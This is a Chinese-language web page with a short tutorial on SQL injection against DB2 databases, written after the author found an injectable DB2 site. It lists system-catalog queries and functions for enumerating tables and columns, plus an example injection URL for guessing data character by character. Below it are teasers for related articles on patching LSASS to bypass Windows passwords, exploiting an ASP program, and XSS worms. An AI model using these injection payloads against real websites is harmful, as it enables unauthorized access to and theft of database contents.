建站极客
实用技巧 漏洞研究 正文
Sql Injection in DB2数据库
所属分类:
实用技巧 / 漏洞研究
阅读数:
1431
收藏 0
赞 0
分享
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
参考了IBM DB2的文档,总结了这样几条:
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
可以返回系统中所有用户创建的表(table)名
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
返回表中的列名
3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
这是最关键的地方,返回第一条记录,类似于sql server中的top 1
4、SUBSTR(string, position, length)
返回字符串子串的函数,类似于mid
5、ASCII()这个就不用多说了。
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
http://blog.waynedeng.com/blogview.asp?logID=543
MySQL Proxy(解决注入的另一思路) MySQL Proxy的主要作用是用来做负载均衡,数据库读写分离的。但是需要注意的是,MySQL Proxy还有个强大的扩展功能就是支持Lua语言——魔兽也是使用了Lua来开发游戏,据我所知网易也是——可以参见云风的博客。
评论 0
收藏 0
赞 0
分享
分析NtGodMode.exe干了什么 NtGodMode.exe是通过打开LSASS.EXE进程msv1_0.dll模块空间里,然后搜索特征值8B 4D 0C 49之后第1个32 C0 这个32C0汇编码xor al,al,修改为B001对应汇编码mov al,1 为什么mov al,1,以后就不用密码了?
评论 0
收藏 0
赞 0
分享
伯乐asp收信程序漏洞及利用程序利用代码 信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
发这个也是因为看了asm所写的新概念收信程序 箱子永远不会被黑
评论 0
收藏 0
赞 0
分享
字符集导致的浏览器跨站脚本攻击分析 前言:这种利用类型的攻击早在06年就被安全研究人员指出,不过一直没有在国内重视。而由于我们国内大部分站点正是这种有漏洞的字符集,所以影响还是比较大,希望各大站快速修复。可以看看http://applesoup.googlepages.com/。
评论 0
收藏 0
赞 0
分享
Search Engine XSS Worm 作者:余弦
来源:0x37 Security
有挑战才有意思,为了诞生个Search Engine XSS Worm,这里拿yeeyan做实验了。
评论 0
收藏 0
赞 0
分享
暂时屏蔽 IE 最新 0day的4 种方法 IE 最新 0day 波及了微软全线系统居然在2008年12月14日8:00:15还没有出补丁!我查看微软站点,好像有几个手动操作的办法暂时屏蔽。
评论 0
收藏 0
赞 0
分享
查看更多